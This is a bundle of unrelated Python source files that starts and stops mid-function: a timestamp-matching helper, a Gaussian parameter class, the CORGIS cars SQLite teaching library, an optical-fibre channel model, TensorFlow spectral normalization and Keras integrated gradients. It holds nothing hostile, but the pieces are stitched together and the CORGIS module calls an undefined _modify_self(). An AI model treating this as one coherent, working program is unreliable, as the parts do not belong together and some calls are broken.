new_right_df = np.array(
[np.datetime64(parser.parse(dt)) for dt in right_df[right_col]]
)
choices = np.unique(new_right_df)
left_keys = np.array(
[np.datetime64(parser.parse(dt)) for dt in left_df[left_col].values]
)
return (1.0 - accuracy) * cls._compute_time_range(left_keys, choices)
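# Illustrative note (not part of the original primitive): the tolerance is a fraction of the
# smaller of the two time ranges. With hypothetical data where the left column spans 10 days
# and the right column spans 100 days, an accuracy of 0.9 yields a tolerance of
# (1 - 0.9) * 10 days = 1 day, so each left timestamp is matched to the nearest right
# timestamp that is at most one day away (and to NaT otherwise).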
|
# python3
# -*- coding: utf-8 -*-
# @Author : lina
# @Time : 2018/5/3 14:38
"""
Gaussian distribution parameters (means and variances) for matched and unmatched pairs.
"""
class Gaussian():
mu1 = 0 # double type, mean value of matched pairs
mu2 = 0 # double type, mean value of unmatched pairs
sigma1 = 0 # double type, variance of matched pairs
sigma2 = 0 # double type, variance of unmatched pairs
def __init__(self, mu1, mu2, sigma1, sigma2):
self.mu1 = mu1
self.mu2 = mu2
self.sigma1 = sigma1
self.sigma2 = sigma2
def set_mu_and_sigma(self, mu1, mu2, sigma1, sigma2):
self.mu1 = mu1
self.mu2 = mu2
self.sigma1 = sigma1
self.sigma2 = sigma2
def set_mu1(self, mu1):
self.mu1 = mu1
def set_mu2(self, mu2):
self.mu2 = mu2
def set_sigma1(self, sigma1):
self.sigma1 = sigma1
def set_sigma2(self, sigma2):
self.sigma2 = sigma2
def get_mu1(self):
return self.mu1
def get_mu2(self):
return self.mu2
def get_sigma1(self):
return self.sigma1
def get_sigma2(self):
return self.sigma2
def to_string(self):
print("mu1: ", self.mu1, " mu2: ", self.mu2, " sigma1: ", self.sigma1, " sigma2: ", self.sigma2)
|
'''
Hello student. Thank you for downloading a CORGIS library. However, you do not need to open this library. Instead you should use the following:
import cars
If you opened the file because you are curious how this library works, then well done! We hope that you find it a useful learning experience. However, you should know that this code is meant to solve somewhat esoteric pedagogical problems, so it is often not best practices.
'''
import sys as _sys
import os as _os
import json as _json
import sqlite3 as _sql
import difflib as _difflib
class _Constants(object):
'''
Global singleton object to hide some of the constants; some IDEs reveal internal module details very aggressively, and there's no other way to hide stuff.
'''
_HEADER = {'User-Agent':
'CORGIS Cars library for educational purposes'}
_PYTHON_3 = _sys.version_info >= (3, 0)
_TEST = False
_HARDWARE = 1000
if _Constants._PYTHON_3:
import urllib.request as _request
from urllib.parse import quote_plus as _quote_plus
from urllib.error import HTTPError as _HTTPError
else:
import urllib2 as _urllib2
from urllib import quote_plus as _quote_plus
from urllib2 import HTTPError as _HTTPError
class DatasetException(Exception):
''' Thrown when there is an error loading the dataset for some reason.'''
pass
_Constants._DATABASE_NAME = "cars.db"
if not _os.access(_Constants._DATABASE_NAME, _os.F_OK):
raise DatasetException("Error! Could not find a \"{0}\" file. Make sure that there is a \"{0}\" in the same directory as \"{1}.py\"! Spelling is very important here.".format(_Constants._DATABASE_NAME, __name__))
elif not _os.access(_Constants._DATABASE_NAME, _os.R_OK):
raise DatasetException("Error! Could not read the \"{0}\" file. Make sure that it readable by changing its permissions. You may need to get help from your instructor.".format(_Constants._DATABASE_NAME, __name__))
elif not _os.access(_Constants._DATABASE_NAME, _os.W_OK):
_sys.stderr.write('The local cache (\"{0}\") will not be updated. Make sure that it is writable by changing its permissions. You may need to get help from your instructor.\n'.format(_Constants._DATABASE_NAME))
_sys.stderr.flush()
_Constants._DATABASE = _sql.connect(_Constants._DATABASE_NAME)
class _Auxiliary(object):
@staticmethod
def _parse_type(value, type_func):
"""
Attempt to cast *value* using *type_func*, returning the type's zero value if *value* is None or the cast fails.
"""
default = type_func(0)
if value is None:
return default
try:
return type_func(value)
except ValueError:
return default
@staticmethod
def _byteify(input):
"""
Force the given input to only use `str` instead of `bytes` or `unicode`.
This works recursively if the input is a dict or a list.
"""
if isinstance(input, dict):
return {_Auxiliary._byteify(key): _Auxiliary._byteify(value) for key, value in input.items()}
elif isinstance(input, list):
return [_Auxiliary._byteify(element) for element in input]
elif _Constants._PYTHON_3 and isinstance(input, str):
return str(input.encode('ascii', 'replace').decode('ascii'))
elif not _Constants._PYTHON_3 and isinstance(input, unicode):
return str(input.encode('ascii', 'replace').decode('ascii'))
else:
return input
@staticmethod
def _guess_schema(input):
if isinstance(input, dict):
return {str(key.encode('ascii', 'replace').decode('ascii')):
_Auxiliary._guess_schema(value) for key, value in input.items()}
elif isinstance(input, list):
return [_Auxiliary._guess_schema(input[0])] if input else []
else:
return type(input)
################################################################################
# Domain Objects
################################################################################
################################################################################
# Interfaces
################################################################################
def get_cars(test=True):
"""
Returns the complete list of cars.
"""
if _Constants._TEST or test:
rows = _Constants._DATABASE.execute("SELECT data FROM cars LIMIT {hardware}".format(
hardware=_Constants._HARDWARE))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
else:
rows = _Constants._DATABASE.execute("SELECT data FROM cars".format(
hardware=_Constants._HARDWARE))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
def get_cars_by_year(year, test=True):
"""
Returns all the cars for a given year.
:param year: The year as an integer, between 1921 and 2013.
:type year: int
"""
if _Constants._TEST or test:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE year=? LIMIT {hardware}".format(
hardware=_Constants._HARDWARE),
(year, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
else:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE year=?".format(
hardware=_Constants._HARDWARE),
(year, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
def get_cars_by_make(make, test=True):
"""
Returns all the cars of a certain make.
:param make: The make of the cars
:type make: str
"""
# Match it against the recommended values
potentials = [r[0].lower() for r in _Constants._DATABASE.execute("SELECT DISTINCT make FROM cars").fetchall()]
if make.lower() not in potentials:
best_guesses = _difflib.get_close_matches(make, potentials)
if best_guesses:
raise DatasetException("Error, the given identifier could not be found. Perhaps you meant one of:\n\t{}".format('\n\t'.join(map('"{}"'.format, best_guesses))))
else:
raise DatasetException("Error, the given identifier could not be found. Please check to make sure you have the right spelling.")
if _Constants._TEST or test:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE make=? COLLATE NOCASE LIMIT {hardware}".format(
hardware=_Constants._HARDWARE),
(make, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
else:
rows = _Constants._DATABASE.execute("SELECT data FROM cars WHERE make=? COLLATE NOCASE".format(
hardware=_Constants._HARDWARE),
(make, ))
data = [r[0] for r in rows]
data = [_Auxiliary._byteify(_json.loads(r)) for r in data]
return _Auxiliary._byteify(data)
################################################################################
# Internalized testing code
################################################################################
def _test_interfaces():
from pprint import pprint as _pprint
from timeit import default_timer as _default_timer
# Production test
print("Production get_cars")
start_time = _default_timer()
result = get_cars(test=False)
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Test test
print("Test get_cars")
start_time = _default_timer()
result = get_cars()
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Production test
print("Production get_cars_by_year")
start_time = _default_timer()
result = get_cars_by_year("2001", test=False)
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Test test
print("Test get_cars_by_year")
start_time = _default_timer()
result = get_cars_by_year("2001")
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Production test
print("Production get_cars_by_make")
start_time = _default_timer()
result = get_cars_by_make("'Pontiac'", test=False)
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
# Test test
print("Test get_cars_by_make")
start_time = _default_timer()
result = get_cars_by_make("'Pontiac'")
print("{} entries found.".format(len(result)))
_pprint(_Auxiliary._guess_schema(result))
print("Time taken: {}".format(_default_timer() - start_time))
if __name__ == '__main__':
from optparse import OptionParser as _OptionParser
_parser = _OptionParser()
_parser.add_option("-t", "--test", action="store_true",
default=False,
help="Execute the interfaces to test them.")
_parser.add_option("-r", "--reset", action="store_true",
default=False,
help="Reset the cache")
(_options, _args) = _parser.parse_args()
if _options.test:
_test_interfaces()
if _options.reset:
_modify_self()
|
import random
class Fibre(object):
"""
Model of an optical fibre channel, parameterised by its length in metres and its absorption coefficient alpha in dB/m.
"""
def __init__(self, length=0.0, alpha=0.0):
if not isinstance(length, int) and not isinstance(length, float):
raise ValueError("Length must be float or int")
elif length < 0:
raise ValueError("Length must be non-negative")
else:
self._length = length
if not isinstance(alpha, int) and not isinstance(alpha, float):
raise ValueError("Alpha must be float or int")
elif alpha < 0 or alpha > 1:
raise ValueError("Alpha must lie in the interval [0, 1]")
else:
self._alpha = alpha
@property
def length(self):
"""
Length of the channel in m
Returns:
(float) : Length of the channel in m
"""
return self._length
@length.setter
def length(self, length):
"""
Set the length of the channel
Args:
length (float) : Length of the channel in m
"""
if not isinstance(length, int) and not isinstance(length, float):
raise ValueError("Length must be float or int")
elif length < 0:
raise ValueError("Length must be non-negative")
else:
self._length = length
@property
def alpha(self):
"""
Absorption coefficient of the channel in dB/m
Returns:
(float) : Absorption coefficient of the channel in dB/m
"""
return self._alpha
@alpha.setter
def alpha(self, alpha):
"""
Set the absorption coefficient of the channel
Args:
alpha (float) : Absorption coefficient of the channel in dB/m
"""
if not isinstance(alpha, int) and not isinstance(alpha, float):
raise ValueError("Alpha must be float or int")
elif alpha < 0 or alpha > 1:
raise ValueError("Alpha must lie in the interval [0, 1]")
else:
self._alpha = alpha
@property
def transmission_p(self):
"""
Transmission probability of the channel
Returns:
(float) : Probability that a qubit is transmitted
"""
return 10.0 ** (-1.0 * self._alpha * self._length / 10.0)
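# Illustrative sketch (not part of the original class): transmission_p is the usual dB
# attenuation formula 10 ** (-alpha * length / 10). With a hypothetical alpha of
# 0.0002 dB/m (0.2 dB/km) and a 50 km fibre (50_000 m), the total loss is 10 dB and the
# transmission probability is about 0.1:
#
#   >>> round(Fibre(length=50_000, alpha=0.0002).transmission_p, 3)
#   0.1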
def qubit_func(self, qubit):
"""
Function to modify the qubit based on channel properties
In this case - Returns None if transmission fails or the original qubit if transmission succeeds
Required in all channel models
Returns
(object) : Modified qubit
"""
if random.random() > self.transmission_p:
if qubit is not None:
qubit.release()
return None
else:
return qubit
|
import warnings
import numpy as np
import tensorflow as tf
from GeneralTools.misc_fun import FLAGS
class SpectralNorm(object):
def __init__(self, sn_def, name_scope='SN', scope_prefix='', num_iter=1):
""" This class contains functions to calculate the spectral normalization of the weight matrix
using power iteration.
The application of spectral normalization to neural networks is proposed in the following papers:
Yoshida, Y., & Miyato, T. (2017).
Spectral Norm Regularization for Improving the Generalizability of Deep Learning.
Miyato, T., Kataoka, T., Koyama, M., & Yoshida, Y. (2017).
Spectral Normalization for Generative Adversarial Networks,
Here spectral normalization is generalized for any linear ops or combination of linear ops
Example of usage:
Example 1.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
sigma = SpectralNorm(sn_def, name_scope='SN1', num_iter=20).apply(w)
Example 2.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
w2 = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
SN = SpectralNorm(sn_def, num_iter=20)
sigma1 = SN.apply(w)
sigma2 = SN.apply(w2, name_scope='SN2', num_iter=30)
:param sn_def: a dictionary with keys depending on the type of kernel:
type keys value options
dense: 'op' 'd' - common dense layer; 'cd' - conditional dense layers;
'dcd' - dense + conditional dense; 'dck' - dense * conditional scale
'project' - same to cd, except num_out is 1
conv: 'op' 'c' - convolution; 'tc' - transpose convolution;
'cck' - convolution * conditional scale; 'tcck' - t-conv * conditional scale
'strides' integer
'dilation' integer
'padding' 'SAME' or 'VALID'
'data_format' 'NCHW' or 'NHWC'
'input_shape' list of integers in format NCHW or NHWC
'output_shape' for 'tc', output shape must be provided
:param name_scope:
:param scope_prefix:
:param num_iter: number of power iterations per run
"""
self.sn_def = sn_def.copy()
self.name_scope = name_scope
self.scope_prefix = scope_prefix
self.name_in_err = self.scope_prefix + self.name_scope
self.num_iter = num_iter
# initialize
self.w = None
self.x = None
self.use_u = None
self.is_initialized = False
self.forward = None
self.backward = None
# format stride
if self.sn_def['op'] in {'c', 'tc', 'cck', 'tcck'}:
if self.sn_def['data_format'] in ['NCHW', 'channels_first']:
self.sn_def['strides'] = (1, 1, self.sn_def['strides'], self.sn_def['strides'])
else:
self.sn_def['strides'] = (1, self.sn_def['strides'], self.sn_def['strides'], 1)
assert 'output_shape' in self.sn_def, \
'{}: for conv, output_shape must be provided.'.format(self.name_in_err)
def _init_routine(self):
""" This function decides the routine to minimize memory usage
:return:
"""
if self.is_initialized is False:
# decide the routine
if self.sn_def['op'] in {'d', 'project'}:
# for d kernel_shape [num_in, num_out]; for project, kernel shape [num_class, num_in]
assert len(self.kernel_shape) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape
# self.use_u = True
self.use_u = True if num_in <= num_out else False
x_shape = [1, num_in] if self.use_u else [1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'cd'}: # kernel_shape [num_class, num_in, num_out]
assert len(self.kernel_shape) == 3, \
'{}: kernel shape {} does not have length 3'.format(self.name_in_err, self.kernel_shape)
num_class, num_in, num_out = self.kernel_shape
self.use_u = True if num_in <= num_out else False
x_shape = [num_class, 1, num_in] if self.use_u else [num_class, 1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'dck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 2 and len(self.kernel_shape[1]) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape[0]
num_class = self.kernel_shape[1][0]
self.use_u = True if num_in <= num_out else False
x_shape = [num_class, num_in] if self.use_u else [num_class, num_out]
self.forward = (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0))
self.backward = (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0)) \
if self.use_u else (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'c', 'tc'}:
assert len(self.kernel_shape) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
# self.use_u = True
self.use_u = True \
if np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:]) \
else False
if self.sn_def['op'] in {'c'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = 1
elif self.sn_def['op'] in {'tc'}: # tc
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = 1
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.forward = self._conv_ if self.use_u else (lambda y: self._conv_t_(y, x_shape=y_shape))
self.backward = (lambda y: self._conv_t_(y, x_shape=y_shape)) if self.use_u else self._conv_
elif self.sn_def['op'] in {'cck', 'tcck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 4 and len(self.kernel_shape[1]) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
self.use_u = True \
if np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:]) \
else False
num_class = self.kernel_shape[1][0]
if self.sn_def['op'] in {'cck'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0)) \
if self.use_u \
else (lambda y: self._conv_t_(self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0))
self.backward = (lambda y: self._conv_t_(
self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0)) \
if self.use_u else (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'tcck'}: # tcck
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0)) \
if self.use_u \
else (lambda y: self._scalar_(self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0))
self.backward = (lambda y: self._scalar_(
self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0))
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
else:
raise NotImplementedError('{}: {} is not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.x = tf.compat.v1.get_variable(
'in_rand', shape=x_shape, dtype=tf.float32,
initializer=tf.truncated_normal_initializer(), trainable=False)
self.is_initialized = True
def _scalar_(self, x, index=None, offset=0.0):
""" This function defines a elementwise multiplication op: y = x * w, where x shape [N, C, ...] or [N, ..., C],
w shape [N, C, 1,..,1] or [N, 1,...,1, C], y shape [N, C, ...] or [N, ..., C]
:param x:
:param index: if index is provided, self.w is a list or tuple
:param offset: add a constant offset
:return:
"""
w = self.w if index is None else self.w[index]
return tf.multiply(x, w, name='scalar') if offset == 0.0 else tf.multiply(x, w + offset, name='scalar')
def _dense_(self, x, index=None):
""" This function defines a dense op: y = x * w, where x shape [..., a, b], w shape [..., b, c],
y shape [..., a, c]
:param x:
:param index: if index is provided, self.w is a list or tuple
:return:
"""
w = self.w if index is None else self.w[index]
return tf.matmul(x, w, name='dense')
def _dense_t_(self, y, index=None):
""" Transpose version of self._dense_
:param y:
:param index: if index is provided, self.w is a list or tuple
:return:
"""
w = self.w if index is None else self.w[index]
return tf.matmul(y, w, transpose_b=True, name='dense_t')
def _conv_(self, x, index=None):
""" This function defines a conv op: y = x \otimes w, where x shape NCHW or NHWC, w shape kkhw,
y shape NCHW or NHWC
:param x:
:param index: if index is provided, self.w is a list or tuple
:return:
"""
w = self.w if index is None else self.w[index]
if self.sn_def['dilation'] > 1:
return tf.nn.atrous_conv2d(
x, w, rate=self.sn_def['dilation'], padding=self.sn_def['padding'], name='conv')
else:
return tf.nn.conv2d(
x, w, strides=self.sn_def['strides'], padding=self.sn_def['padding'],
data_format=self.sn_def['data_format'], name='conv')
def _conv_t_(self, y, x_shape, index=None):
""" Transpose version of self._conv_
:param y:
:param x_shape:
:param index:
:return:
"""
w = self.w if index is None else self.w[index]
if self.sn_def['dilation'] > 1:
return tf.nn.atrous_conv2d_transpose(
y, w, output_shape=x_shape, rate=self.sn_def['dilation'], padding=self.sn_def['padding'],
name='conv_t')
else:
return tf.nn.conv2d_transpose(
y, w, output_shape=x_shape, strides=self.sn_def['strides'], padding=self.sn_def['padding'],
data_format=self.sn_def['data_format'], name='conv_t')
def _l2_norm(self, x):
if self.sn_def['op'] in {'cd'}: # x shape [num_class, 1, num_in or num_out]
return tf.norm(x, ord='euclidean', axis=2, keepdims=True) # return [num_class, 1, 1]
elif self.sn_def['op'] in {'dck'}: # x shape [num_class, num_in or num_out]
return tf.norm(x, ord='euclidean', axis=1, keepdims=True) # return [num_class, 1]
elif self.sn_def['op'] in {'cck', 'tcck'}:
# x shape [num_class, num_in or num_out, H, W] or [num_class, H, W, num_in or num_out]
# tf.norm is not used here because its axis argument cannot be the tuple (1, 2, 3)
return tf.sqrt(
tf.reduce_sum(tf.square(x), axis=(1, 2, 3), keepdims=True), name='norm') # return [num_class, 1, 1, 1]
elif self.sn_def['op'] in {'d', 'c', 'tc', 'project'}:
# x shape [1, num_in or num_out], or [1, num_in or num_out, H, W] or [1, H, W, num_in or num_out]
return tf.norm(x, ord='euclidean', axis=None) # return scalar
def _l2_normalize_(self, w):
"""
:param w:
:return:
"""
return w / (self._l2_norm(w) + FLAGS.EPSI)
def _power_iter_(self, x, step):
""" This function does power iteration for one step
:param x:
:param step:
:return:
"""
y = self._l2_normalize_(self.forward(x))
x_update = self._l2_normalize_(self.backward(y))
sigma = self._l2_norm(self.forward(x))
return sigma, x_update, step + 1
def _power_iter_no_step(self, x):
y = self._l2_normalize_(self.forward(x))
x_update = self._l2_normalize_(self.backward(y))
sigma = self._l2_norm(self.forward(x))
return sigma, x_update
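# Illustrative note (not part of the original class): one power-iteration step estimates the
# spectral norm sigma(W) = max_x ||W x|| / ||x||. Starting from the persistent random vector
# self.x, y = forward(x) / ||forward(x)|| and x' = backward(y) / ||backward(y)|| move x
# towards the top singular direction, and ||forward(x)|| converges to the largest singular
# value, so even num_iter=1 refines the estimate a little on every training step (the usual
# spectral-normalization trick from Miyato et al.).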
def __call__(self, kernel, **kwargs):
""" This function calculates spectral normalization for kernel
:param kernel:
:param kwargs:
:return:
"""
# check inputs
if 'name_scope' in kwargs and kwargs['name_scope'] != self.name_scope:
# different name_scope will initialize another SN process
self.name_scope = kwargs['name_scope']
self.name_in_err = self.scope_prefix + self.name_scope
if self.is_initialized:
warnings.warn(
'{}: starting a new SN process loses the links to the previous one.'.format(self.name_in_err))
self.is_initialized = False
self.use_u = None
if 'num_iter' in kwargs:
self.num_iter = kwargs['num_iter']
if isinstance(kernel, (list, tuple)):
# for dcd, cck, the kernel is a list of two kernels
kernel_shape = [k.get_shape().as_list() for k in kernel]
else:
kernel_shape = kernel.get_shape().as_list()
with tf.compat.v1.variable_scope(self.name_scope, reuse=tf.compat.v1.AUTO_REUSE):
# In some cases, the spectral norm can be easily calculated.
sigma = None
if self.sn_def['op'] in {'d', 'project'} and 1 in kernel_shape:
# for project op. kernel_shape = [num_class, num_in]
sigma = tf.norm(kernel, ord='euclidean')
elif self.sn_def['op'] in {'cd'}:
if len(kernel_shape) == 2: # equivalent to [num_class, num_in, 1]
sigma = tf.norm(kernel, ord='euclidean', axis=1, keepdims=True)
elif kernel_shape[1] == 1 or kernel_shape[2] == 1:
sigma = tf.norm(kernel, ord='euclidean', axis=(1, 2), keepdims=True)
elif self.sn_def['op'] in {'dcd'}: # dense + conditional dense
# kernel_cd [num_class, num_in, num_out]
kernel_cd = tf.expand_dims(kernel[1], axis=2) if len(kernel_shape[1]) == 2 else kernel[1]
kernel = tf.expand_dims(kernel[0], axis=0) + kernel_cd # [num_class, num_in, num_out]
if 1 in kernel_shape[0]: # kernel_d shape [1, num_out] or [num_in, 1]
sigma = tf.norm(kernel, ord='euclidean', axis=(1, 2), keepdims=True) # [num_class, 1, 1]
else: # convert dcd to cd
kernel_shape = kernel.get_shape().as_list()
self.sn_def['op'] = 'cd'
elif self.sn_def['op'] in {'dck'}: # dense * conditional scales
if kernel_shape[0][1] == 1:
sigma = tf.norm(kernel[0], ord='euclidean') * tf.abs(kernel[1]) # [num_class, 1]
# initialize a random input and calculate spectral norm
if sigma is None:
# decide the routine
self.w = kernel
self.kernel_shape = kernel_shape
self._init_routine()
# initialize sigma
if self.sn_def['op'] in {'dck'}:
sigma_init = tf.zeros((self.kernel_shape[1][0], 1), dtype=tf.float32)
elif self.sn_def['op'] in {'cd'}: # for cd, the sigma is a [num_class, 1, 1]
sigma_init = tf.zeros((self.kernel_shape[0], 1, 1), dtype=tf.float32)
elif self.sn_def['op'] in {'cck', 'tcck'}:
sigma_init = tf.zeros((self.kernel_shape[1][0], 1, 1, 1), dtype=tf.float32)
else:
sigma_init = tf.constant(0.0, dtype=tf.float32)
# do power iterations
# If num_iter is 1, which it typically should be, don't build a while loop; just run a single power iteration.
if self.num_iter == 1:
# print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ no sn loop')
sigma, x_update = self._power_iter_no_step(self.x)
else:
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ doing sn loop: may interfere with DP-SGD')
sigma, x_update, _ = tf.while_loop(
cond=lambda _1, _2, i: i < self.num_iter,
body=lambda _1, x, i: self._power_iter_(x, step=i),
loop_vars=(sigma_init, self.x, tf.constant(0, dtype=tf.int32)),
name='spectral_norm_while')
# update the random input
tf.compat.v1.add_to_collection(tf.compat.v1.GraphKeys.UPDATE_OPS, tf.compat.v1.assign(self.x, x_update))
return sigma
def apply(self, kernel, **kwargs):
return self.__call__(kernel, **kwargs)
|
################################################################
# Implemented by Naozumi Hiranuma (hiranumn@uw.edu) #
# #
# Keras-compatible implementation of Integrated Gradients      #
# proposed in "Axiomatic Attribution for Deep Networks"        #
# (https://arxiv.org/abs/1703.01365). #
# #
# Keywords: Shapley values, interpretable machine learning #
################################################################
from __future__ import division, print_function
import numpy as np
from time import sleep
import sys
import keras.backend as K
from keras.models import Model, Sequential
'''
Integrated gradients approximates Shapley values by integrating partial
gradients with respect to input features from reference input to the
actual input. The following class implements the paper "Axiomatic
Attribution for Deep Networks".
'''
class integrated_gradients:
# model: Keras model that you wish to explain.
# outchannels: in case the model is multi-task, you can specify which outputs you want to explain.
def __init__(self, model, outchannels=[], verbose=1):
#get backend info (either tensorflow or theano)
self.backend = K.backend()
#load model supports keras.Model and keras.Sequential
if isinstance(model, Sequential):
self.model = model.model
elif isinstance(model, Model):
self.model = model
else:
print("Invalid input model")
return -1
#load input tensors
self.input_tensors = []
for i in self.model.inputs:
self.input_tensors.append(i)
# The learning phase flag is a bool tensor (0 = test, 1 = train)
# to be passed as input to any Keras function that uses
# a different behavior at train time and test time.
self.input_tensors.append(K.learning_phase())
# If outchannels are specified, use them.
# Otherwise evaluate all outputs.
self.outchannels = outchannels
if len(self.outchannels) == 0:
if verbose: print("Evaluated output channel (0-based index): All")
if K.backend() == "tensorflow":
self.outchannels = range(self.model.output.shape[1]._value)
elif K.backend() == "theano":
self.outchannels = range(self.model.output._keras_shape[1])
else:
if verbose:
print("Evaluated output channels (0-based index):")
print(','.join([str(i) for i in self.outchannels]))
#Build gradient functions for desired output channels.
self.get_gradients = {}
if verbose: print("Building gradient functions")
# Evaluate over all requested channels.
for c in self.outchannels:
# Get tensor that calculates gradient
if K.backend() == "tensorflow":
gradients = self.model.optimizer.get_gradients(self.model.output[:, c], self.model.input)
if K.backend() == "theano":
gradients = self.model.optimizer.get_gradients(self.model.output[:, c].sum(), self.model.input)
# Build computational graph that computes the tensors given inputs
self.get_gradients[c] = K.function(inputs=self.input_tensors, outputs=gradients)
# This takes a lot of time for a big model with many tasks.
# So let's print the progress.
if verbose:
sys.stdout.write('\r')
sys.stdout.write("Progress: "+str(int((c+1)*1.0/len(self.outchannels)*1000)*1.0/10)+"%")
sys.stdout.flush()
# Done
if verbose: print("\nDone.")
'''
Input: sample to explain, channel to explain
Optional inputs:
- reference: reference values (defaulted to 0s).
- num_steps: number of steps from the reference values to the actual sample (defaulted to 50).
Output: explanation as a numpy array, or a list of numpy arrays when the sample is a list of inputs.
'''
def explain(self, sample, outc=0, reference=False, num_steps=50, verbose=0):
# Each element for each input stream.
samples = []
numsteps = []
step_sizes = []
# If multiple inputs are present, feed them as list of np arrays.
if isinstance(sample, list):
#If reference is present, reference and sample size need to be equal.
if reference is not False:
assert len(sample) == len(reference)
for i in range(len(sample)):
if reference is False:
_output = integrated_gradients.linearly_interpolate(sample[i], False, num_steps)
else:
_output = integrated_gradients.linearly_interpolate(sample[i], reference[i], num_steps)
samples.append(_output[0])
numsteps.append(_output[1])
step_sizes.append(_output[2])
# Or you can feed just a single numpy arrray.
elif isinstance(sample, np.ndarray):
_output = integrated_gradients.linearly_interpolate(sample, reference, num_steps)
samples.append(_output[0])
numsteps.append(_output[1])
step_sizes.append(_output[2])
# Desired channel must be in the list of outputchannels
assert outc in self.outchannels
if verbose: print("Explaning the "+str(self.outchannels[outc])+"th output.")
# For tensorflow backend
_input = []
for s in samples:
_input.append(s)
_input.append(0)
if K.backend() == "tensorflow":
gradients = self.get_gradients[outc](_input)
elif K.backend() == "theano":
gradients = self.get_gradients[outc](_input)
if len(self.model.inputs) == 1:
gradients = [gradients]
explanation = []
for i in range(len(gradients)):
_temp = np.sum(gradients[i], axis=0)
